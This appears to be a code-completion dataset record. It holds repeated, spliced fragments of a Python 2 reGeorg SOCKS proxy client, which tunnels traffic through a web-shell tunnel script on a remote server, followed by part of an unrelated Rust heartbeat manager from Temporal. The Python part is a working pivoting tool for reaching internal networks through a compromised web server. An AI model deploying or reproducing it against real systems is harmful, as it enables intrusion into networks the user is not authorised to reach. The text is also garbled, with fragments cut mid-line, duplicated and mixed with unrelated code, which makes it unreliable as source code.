response = requests.post(url=self.connectString, headers=header, data=None)
response_data = None
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
response_data = response.content
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("X-ERROR")))
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
if response_data is None:
# Remote socket closed
break
if len(response_data) == 0:
time.sleep(0.1)
continue
self.pSocket.send(response_data)
except Exception, ex:
print(format_exc())
raise ex
self.closeRemoteSession()
logger.debug("[%s:%d] Closing localsocket" % (self.target, self.targetPort))
try:
self.pSocket.close()
except:
logger.debug("[%s:%d] Localsocket already closed" % (self.target, self.targetPort))
def writer(self):
global READBUFSIZE
while True:
try:
self.pSocket.settimeout(1)
# 'GET / HTTP/1.1\r\nHost: 192.168.2.1\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n'
data = self.pSocket.recv(READBUFSIZE)
if not data:
break
header = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream",
"Connection": "Keep-Alive"}
# 携带数据
response = requests.post(url=self.connectString, headers=header, data=data)
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
if response_header.get("set-cookie") is not None:
self.cookie = response_header.get("set-cookie")
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("x-error")))
break
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
break
# transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data)))
except timeout:
continue
except Exception, ex:
raise ex
self.closeRemoteSession()
logger.debug("Closing localsocket")
try:
self.pSocket.close()
except:
logger.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
r = Thread(target=self.reader, args=())
r.start()
w = Thread(target=self.writer, args=())
w.start()
w.join()
r.join()
except Exception, e:
# 报错关闭连接
logger.error(format_exc())
self.closeRemoteSession()
self.pSocket.close()
def askgeorg(url):
"""检测reg连接方法"""
try:
response = requests.get(url=url, headers=HEADER, timeout=TIMEOUT)
except Exception, e:
return False
else:
if response:
text = response.text.strip()
if response.status_code == 200 and text == "Georg says, 'All seems fine'":
logger.info(text)
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1")
parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888")
parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST",
type=int, default="1024")
parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script")
# 取消了原通过命令行指定log级别,通过配置文件指定
# parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO")
args = parser.parse_args()
logger.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url))
logger.info("Checking if Georg is ready")
# 查看shell连通性
if not askgeorg(url=args.url):
logger.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
# 创建socket
servSock = socket(AF_INET, SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 127.0.0.1:8889,ubuntu中proxychains监听8889端口
servSock.bind((args.listen_on, args.listen_port))
servSock.listen(1000)
while True:
try:
sock, addr_info = servSock.accept()
sock.settimeout(SOCKTIMEOUT)
logger.debug("Incomming connection")
# 发起传输数据请求
session(sock, args.url).start()
except KeyboardInterrupt, ex:
break
except Exception, e:
logger.error(e)
servSock.close() | response_header = response.headers
if response.status_code == 200 and response_header.get("X-STATUS") == "OK":
cookie = response_header.get("Set-Cookie")
logger.info("[%s:%s] HTTP [200]: cookie [%s]" % (target, targetPort, cookie)) | random_line_split |
w_reGeorgSocksProxy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from traceback import format_exc
import time
import argparse
from urlparse import urlparse
from socket import *
from threading import Thread
import requests
from handle_log import logger
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT = 300
VER = "\x05"
METHOD = "\x00"
SUCCESS = "\x00"
SOCKFAIL = "\x01"
NETWORKFAIL = "\x02"
HOSTFAIL = "\x04"
REFUSED = "\x05"
TTLEXPIRED = "\x06"
UNSUPPORTCMD = "\x07"
ADDRTYPEUNSPPORT = "\x08"
UNASSIGNED = "\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
HEADER = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
TIMEOUT = (5, 5)
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self, pSocket, connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
else:
if not o.port:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
def parseSocks5(self, sock):
logger.debug("SocksVersion5 detected")
# 02:00
nmethods, methods = (sock.recv(1), sock.recv(1))
# 05:00
sock.sendall(VER + METHOD)
# :02
ver = sock.recv(1)
if ver == "\x02": # this is a hack for proxychains
# 05:01:00:01----:c0:a8:01:02:00:50
# '\x05', '\x01', '\x00', '\x01'
ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1))
else:
cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1))
target = None
targetPort = None
if atyp == "\x01": # IPv4
# Reading 6 bytes for the IP and Port
# c0:a8:01:02
target = sock.recv(4)
# 00:50
targetPort = sock.recv(2)
# 目标地址192.168.2.1
self.target = ".".join([str(ord(i)) for i in target])
elif atyp == "\x03": # Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp == "\x04": # IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr = []
for i in xrange(len(target) / 2):
tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1])))
target = ":".join(tmp_addr)
# 80
self.targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1])
if cmd == "\x02": # BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd == "\x03": # UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd == "\x01": # CONNECT
serverIp = target
try:
serverIp = gethostbyname(self.target)
except:
logger.error("oeps")
# 又转回来\xc0\xa8\x02\x01
serverIp = "".join([chr(int(i)) for i in serverIp.split(".")])
# 获取cookie,在服务端的脚本中,会执行相应端口探测
self.cookie = self.setupRemoteSession(target=self.target, targetPort=str(self.targetPort))
if self.cookie:
sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return True
else:
sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return False
def handleSocks(self, sock):
# 通过proxychain模拟客户端发送数据,第一个字节可以判断是socks5还是socks4
ver = sock.recv(1)
# 05:02:00:02
if ver == "\x05":
return self.parseSocks5(sock)
def setupRemoteSession(self, target, targetPort):
"""探测端口存活"""
header = ({"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": targetPort})
cookie = None
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
return
else:
if response:
response_header = response.headers
if response.status_code == 200 and response_header.get("X-STATUS") == "OK":
cookie = response_header.get("Set-Cookie")
logger.info("[%s:%s] HTTP [200]: cookie [%s]" % (target, targetPort, cookie))
elif response_header.get("X-ERROR"):
logger.error(response_header.get("X-ERROR"))
else:
logger.error("[%s:%s] HTTP [%d]" % (target, targetPort, response.status_code))
return cookie
def closeRemoteSession(self):
header = {"X-CMD": "DISCONNECT", "Cookie": self.cookie}
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
logger.error("Close Connection Failure")
else:
if response.status_code == 200:
logger.info("[%s:%d] Connection Terminated" % (self.httpHost, self.httpPort))
def reader(self):
while True:
try:
if not self.pSocket:
break
header = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = requests.post(url=self.connectString, headers=header, data=None)
response_data = None
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
response_data = response.content
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("X-ERROR")))
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
if response_data is None:
# Remote socket closed
break
if len(response_data) == 0:
time.sleep(0.1)
continue
self.pSocket.send(response_data)
except Exception, ex:
print(format_exc())
raise ex
self.closeRemoteSession()
logger.debug("[%s:%d] Closing localsocket" % (self.target, self.targetPort))
try:
self.pSocket.close()
except:
logger.debug("[%s:%d] Localsocket already closed" % (self.target, self.targetPort))
def writer(self):
global READBUFSIZE
while True:
try:
self.pSocket.settimeout(1)
# 'GET / HTTP/1.1\r\nHost: 192.168.2.1\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n'
data = self.pSocket.recv(READBUFSIZE)
if not data:
break
header = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream",
"Connection": "Keep-Alive"}
# 携带数据
response = requests.post(url=self.connectString, headers=header, data=data)
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
if response_header.get("set-cookie") is not None:
self.cookie = response_header.get("set-cookie")
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.tar | target, self.targetPort, response.status_code))
break
# transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data)))
except timeout:
continue
except Exception, ex:
raise ex
self.closeRemoteSession()
logger.debug("Closing localsocket")
try:
self.pSocket.close()
except:
logger.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
r = Thread(target=self.reader, args=())
r.start()
w = Thread(target=self.writer, args=())
w.start()
w.join()
r.join()
except Exception, e:
# 报错关闭连接
logger.error(format_exc())
self.closeRemoteSession()
self.pSocket.close()
def askgeorg(url):
"""检测reg连接方法"""
try:
response = requests.get(url=url, headers=HEADER, timeout=TIMEOUT)
except Exception, e:
return False
else:
if response:
text = response.text.strip()
if response.status_code == 200 and text == "Georg says, 'All seems fine'":
logger.info(text)
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1")
parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888")
parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST",
type=int, default="1024")
parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script")
# 取消了原通过命令行指定log级别,通过配置文件指定
# parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO")
args = parser.parse_args()
logger.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url))
logger.info("Checking if Georg is ready")
# 查看shell连通性
if not askgeorg(url=args.url):
logger.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
# 创建socket
servSock = socket(AF_INET, SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 127.0.0.1:8889,ubuntu中proxychains监听8889端口
servSock.bind((args.listen_on, args.listen_port))
servSock.listen(1000)
while True:
try:
sock, addr_info = servSock.accept()
sock.settimeout(SOCKTIMEOUT)
logger.debug("Incomming connection")
# 发起传输数据请求
session(sock, args.url).start()
except KeyboardInterrupt, ex:
break
except Exception, e:
logger.error(e)
servSock.close()
| getPort, response.status_code, status, response_header.get("x-error")))
break
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self. | conditional_block |
w_reGeorgSocksProxy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from traceback import format_exc
import time
import argparse
from urlparse import urlparse
from socket import *
from threading import Thread
import requests
from handle_log import logger
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT = 300
VER = "\x05"
METHOD = "\x00"
SUCCESS = "\x00"
SOCKFAIL = "\x01"
NETWORKFAIL = "\x02"
HOSTFAIL = "\x04"
REFUSED = "\x05"
TTLEXPIRED = "\x06"
UNSUPPORTCMD = "\x07"
ADDRTYPEUNSPPORT = "\x08"
UNASSIGNED = "\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
HEADER = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
TIMEOUT = (5, 5)
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self, pSocket, connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
else:
if not o.port:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
def parseSocks5(self, sock):
logger.debug("SocksVersion5 detected")
# 02:00
nmethods, methods = (sock.recv(1), sock.recv(1))
# 05:00
sock.sendall(VER + METHOD)
# :02
ver = sock.recv(1)
if ver == "\x02": # this is a hack for proxychains
# 05:01:00:01----:c0:a8:01:02:00:50
# '\x05', '\x01', '\x00', '\x01'
ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1))
else:
cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1))
target = None
targetPort = None
if atyp == "\x01": # IPv4
# Reading 6 bytes for the IP and Port
# c0:a8:01:02
target = sock.recv(4)
# 00:50
targetPort = sock.recv(2)
# 目标地址192.168.2.1
self.target = ".".join([str(ord(i)) for i in target])
elif atyp == "\x03": # Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp == "\x04": # IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr = []
for i in xrange(len(target) / 2):
tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1])))
target = ":".join(tmp_addr)
# 80
self.targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1])
if cmd == "\x02": # BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd == "\x03": # UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd == "\x01": # CONNECT
serverIp = target
try:
serverIp = gethostbyname(self.target)
except:
logger.error("oeps")
# 又转回来\xc0\xa8\x02\x01
serverIp = "".join([chr(int(i)) for i in serverIp.split(".")])
# 获取cookie,在服务端的脚本中,会执行相应端口探测
self.cookie = self.setupRemoteSession(target=self.target, targetPort=str(self.targetPort))
if self.cookie:
sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return True
else:
sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return False
def handleSocks(self, sock):
# 通过proxychain模拟客户端发送数据,第一个字节可以判断是socks5还是socks4
ver = sock.recv(1)
# 05:02:00:02
if ver == "\x05":
return self.parseSocks5(sock)
def setupRemoteSession(self, target, targetPort):
"""探测端口存活"""
header = ({"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": targetPort})
cookie = None
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
return
else:
if response:
response_header = response.headers
if response.status_code == 200 and response_header.get("X-STATUS") == "OK":
cookie = response_header.get("Set-Cookie")
logger.info("[%s:%s] HTTP [200]: cookie [%s]" % (target, targetPort, cookie))
elif response_header.get("X-ERROR"):
logger.error(response_header.get("X-ERROR"))
else:
logger.error("[%s:%s] HTTP [%d]" % (target, targetPort, response.status_code))
return cookie
def closeRemoteSession(self):
header = {"X-CMD": "DISCONNECT", "Cookie": self.cookie}
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
logger.error("Close Connection Failure")
else:
if response.status_code == 200:
logger.info("[%s:%d] Connection Terminated" % (self.httpHost, self.httpPort))
def reader(self):
while True:
try:
if not self.pSocket:
break
header = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = requests.post(url=self.connectString, headers=header, data=None)
response_data = None
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
response_data = response.content
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("X-ERROR")))
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
if response_data is None:
# Remote socket closed
break
if len(response_data) == 0:
time.sleep(0.1)
continue
self.pSocket.send(response_data)
except Exception, ex:
print(format_exc())
raise ex
self.closeRemoteSession()
logger.debug("[%s:%d] Closing localsocket" % (self.target, self.targetPort))
try:
self.pSocket.close()
except:
logger.debug("[%s:%d] Localsocket already closed" % (self.target, self.targetPort))
def writer(self):
global READBUFSIZE
while True:
try:
self.pSocket.settimeout(1)
# 'GET / HTTP/1.1\r\nHost: 192.168.2.1\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n'
data = self.pSocket.recv(READBUFSIZE)
if not data:
break
header = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream",
"Connection": "Keep-Alive"}
# 携带数据
response = requests.post(url=self.connectString, headers=header, data=data)
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
if response_header.get("set-cookie") is not None:
self.cookie = response_header.get("set-cookie")
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("x-error")))
break
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
break
# transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data)))
except timeout:
continue
except Exception, ex:
raise ex
self.closeRemoteSession()
logger.debug("Closing localsocket")
try:
self.pSocket.close()
except:
logger.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
r = Thread(target=self.reader, args=())
| Exception, e:
return False
else:
if response:
text = response.text.strip()
if response.status_code == 200 and text == "Georg says, 'All seems fine'":
logger.info(text)
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1")
parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888")
parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST",
type=int, default="1024")
parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script")
# 取消了原通过命令行指定log级别,通过配置文件指定
# parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO")
args = parser.parse_args()
logger.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url))
logger.info("Checking if Georg is ready")
# 查看shell连通性
if not askgeorg(url=args.url):
logger.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
# 创建socket
servSock = socket(AF_INET, SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 127.0.0.1:8889,ubuntu中proxychains监听8889端口
servSock.bind((args.listen_on, args.listen_port))
servSock.listen(1000)
while True:
try:
sock, addr_info = servSock.accept()
sock.settimeout(SOCKTIMEOUT)
logger.debug("Incomming connection")
# 发起传输数据请求
session(sock, args.url).start()
except KeyboardInterrupt, ex:
break
except Exception, e:
logger.error(e)
servSock.close()
| r.start()
w = Thread(target=self.writer, args=())
w.start()
w.join()
r.join()
except Exception, e:
# 报错关闭连接
logger.error(format_exc())
self.closeRemoteSession()
self.pSocket.close()
def askgeorg(url):
"""检测reg连接方法"""
try:
response = requests.get(url=url, headers=HEADER, timeout=TIMEOUT)
except | identifier_body |
activity_heartbeat_manager.rs | use crate::task_token::TaskToken;
use crate::{
errors::ActivityHeartbeatError,
protos::{
coresdk::{common, ActivityHeartbeat, PayloadsExt},
temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse,
},
ServerGatewayApis,
};
use std::{
collections::HashMap,
sync::{
atomic::{AtomicBool, Ordering},
Arc,
},
time::{self, Duration},
};
use tokio::{
select,
sync::{
mpsc::{unbounded_channel, UnboundedReceiver, UnboundedSender},
watch::{channel, Receiver, Sender},
Mutex,
},
task::{JoinError, JoinHandle},
time::sleep,
};
pub(crate) struct ActivityHeartbeatManager<SG> {
/// Core will aggregate activity heartbeats for each activity and send them to the server
/// periodically. This map contains sender channel for each activity, identified by the task
/// token, that has an active heartbeat processor.
heartbeat_processors: HashMap<TaskToken, ActivityHeartbeatProcessorHandle>,
events_tx: UnboundedSender<LifecycleEvent>,
events_rx: UnboundedReceiver<LifecycleEvent>,
shutdown_tx: Sender<bool>,
shutdown_rx: Receiver<bool>,
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
/// Used to supply new heartbeat events to the activity heartbeat manager, or to send a shutdown
/// request.
pub(crate) struct ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool,
events: UnboundedSender<LifecycleEvent>,
/// Cancellations that have been received when heartbeating are queued here and can be consumed
/// by [fetch_cancellations]
incoming_cancels: Mutex<UnboundedReceiver<TaskToken>>,
/// Used during `shutdown` to await until all inflight requests are sent.
join_handle: Mutex<Option<JoinHandle<()>>>,
}
/// Used to supply heartbeat details to the heartbeat processor, which periodically sends them to
/// the server.
struct ActivityHeartbeatProcessorHandle {
heartbeat_tx: Sender<Vec<common::Payload>>,
join_handle: JoinHandle<()>,
}
/// Heartbeat processor, that aggregates and periodically sends heartbeat requests for a single
/// activity to the server.
struct ActivityHeartbeatProcessor<SG> {
task_token: TaskToken,
delay: time::Duration,
/// Used to receive heartbeat events.
heartbeat_rx: Receiver<Vec<common::Payload>>,
/// Used to receive shutdown notifications.
shutdown_rx: Receiver<bool>,
/// Used to send CleanupProcessor event at the end of the processor loop.
events_tx: UnboundedSender<LifecycleEvent>,
/// Used to send cancellation notices that we learned about when heartbeating back up to core
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
#[derive(Debug)]
pub enum LifecycleEvent {
Heartbeat(ValidActivityHeartbeat),
CleanupProcessor(TaskToken),
Shutdown,
}
#[derive(Debug)]
pub struct ValidActivityHeartbeat {
pub task_token: TaskToken,
pub details: Vec<common::Payload>,
pub delay: time::Duration,
}
/// Handle that is used by the core for all interactions with the manager, allows sending new
/// heartbeats or requesting and awaiting for the shutdown. When shutdown is requested, signal gets
/// sent to all processors, which allows them to complete gracefully.
impl ActivityHeartbeatManagerHandle {
/// Records a new heartbeat, note that first call would result in an immediate call to the
/// server, while rapid successive calls would accumulate for up to `delay`
/// and then latest heartbeat details will be sent to the server. If there is no activity for
/// `delay` then heartbeat processor will be reset and process would start
/// over again, meaning that next heartbeat will be sent immediately, creating a new processor.
pub fn record(
&self,
details: ActivityHeartbeat,
delay: Duration,
) -> Result<(), ActivityHeartbeatError> {
if self.shutting_down.load(Ordering::Relaxed) {
return Err(ActivityHeartbeatError::ShuttingDown);
}
self.events
.send(LifecycleEvent::Heartbeat(ValidActivityHeartbeat {
task_token: TaskToken(details.task_token),
details: details.details,
delay,
}))
.expect("Receive half of the heartbeats event channel must not be dropped");
Ok(())
}
/// Returns a future that resolves any time there is a new activity cancel that must be
/// dispatched to lang
pub async fn next_pending_cancel(&self) -> Option<TaskToken> {
self.incoming_cancels.lock().await.recv().await
}
/// Initiates shutdown procedure by stopping lifecycle loop and awaiting for all heartbeat | if !self.shutting_down.load(Ordering::Relaxed) {
self.events
.send(LifecycleEvent::Shutdown)
.expect("should be able to send shutdown event");
self.shutting_down.store(true, Ordering::Relaxed);
}
let mut handle = self.join_handle.lock().await;
if let Some(h) = handle.take() {
h.await.expect("shutdown should exit cleanly");
}
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatManager<SG> {
#![allow(clippy::new_ret_no_self)]
/// Creates a new instance of an activity heartbeat manager and returns a handle to the user,
/// which allows to send new heartbeats and initiate the shutdown.
pub fn new(sg: Arc<SG>) -> ActivityHeartbeatManagerHandle {
let (shutdown_tx, shutdown_rx) = channel(false);
let (events_tx, events_rx) = unbounded_channel();
let (cancels_tx, cancels_rx) = unbounded_channel();
let s = Self {
heartbeat_processors: Default::default(),
events_tx: events_tx.clone(),
events_rx,
shutdown_tx,
shutdown_rx,
cancels_tx,
server_gateway: sg,
};
let join_handle = tokio::spawn(s.lifecycle());
ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool::new(false),
events: events_tx,
incoming_cancels: Mutex::new(cancels_rx),
join_handle: Mutex::new(Some(join_handle)),
}
}
/// Main loop, that handles all heartbeat requests and dispatches them to processors.
async fn lifecycle(mut self) {
while let Some(event) = self.events_rx.recv().await {
match event {
LifecycleEvent::Heartbeat(heartbeat) => self.record(heartbeat),
LifecycleEvent::Shutdown => break,
LifecycleEvent::CleanupProcessor(task_token) => {
self.heartbeat_processors.remove(&task_token);
}
}
}
self.shutdown().await.expect("shutdown should exit cleanly")
}
/// Records heartbeat, by sending it to the processor.
/// New processor is created if one doesn't exist, otherwise new event is dispatched to the
/// existing processor's receiver channel.
fn record(&mut self, heartbeat: ValidActivityHeartbeat) {
match self.heartbeat_processors.get(&heartbeat.task_token) {
Some(handle) => {
handle
.heartbeat_tx
.send(heartbeat.details)
.expect("heartbeat channel can't be dropped if we are inside this method");
}
None => {
let (heartbeat_tx, heartbeat_rx) = channel(heartbeat.details);
let processor = ActivityHeartbeatProcessor {
task_token: heartbeat.task_token.clone(),
delay: heartbeat.delay,
heartbeat_rx,
shutdown_rx: self.shutdown_rx.clone(),
events_tx: self.events_tx.clone(),
cancels_tx: self.cancels_tx.clone(),
server_gateway: self.server_gateway.clone(),
};
let join_handle = tokio::spawn(processor.run());
let handle = ActivityHeartbeatProcessorHandle {
heartbeat_tx,
join_handle,
};
self.heartbeat_processors
.insert(heartbeat.task_token, handle);
}
}
}
/// Initiates termination of all heartbeat processors by sending a signal and awaits termination
pub async fn shutdown(mut self) -> Result<(), JoinError> {
self.shutdown_tx
.send(true)
.expect("shutdown channel can't be dropped before shutdown is complete");
for v in self.heartbeat_processors.drain() {
v.1.join_handle.await?;
}
Ok(())
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatProcessor<SG> {
async fn run(mut self) {
// Each processor is initialized with heartbeat payloads, first thing we need to do is send
// it out.
self.record_heartbeat().await;
loop {
sleep(self.delay).await;
select! {
biased;
_ = self.heartbeat_rx.changed() => {
self.record_heartbeat().await;
}
_ = self.shutdown_rx.changed() => {
break;
}
_ = sleep(self.delay) => {
// Timed out while waiting for the next heartbeat. We waited 2 * delay in total,
// where delay is 1/2 of the activity heartbeat timeout. This means that
// activity has either timed out or completed by now.
break;
}
};
}
self.events_tx
.send(LifecycleEvent::CleanupProcessor(self.task_token))
.expect("cleanup requests should not be dropped");
}
async fn record_heartbeat(&mut self) {
let details = self.heartbeat_rx.borrow().clone();
match self
.server_gateway
.record_activity_heartbeat(self.task_token.clone(), details.into_payloads())
.await
{
Ok(RecordActivityTaskHeartbeatResponse { cancel_requested }) => {
if cancel_requested {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
}
// Send cancels for any activity that learns its workflow already finished (which is
// one thing not found implies - other reasons would seem equally valid).
Err(s) if s.code() == tonic::Code::NotFound => {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
Err(e) => {
warn!("Error when recording heartbeat: {:?}", e)
}
}
}
}
#[cfg(test)]
mod test {
use super::*;
use crate::pollers::MockServerGatewayApis;
use crate::protos::coresdk::common::Payload;
use crate::protos::temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse;
use std::time::Duration;
/// Ensure that hearbeats that are sent with a small delay are aggregated and sent roughly once
/// every 1/2 of the heartbeat timeout.
#[tokio::test]
async fn process_heartbeats_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
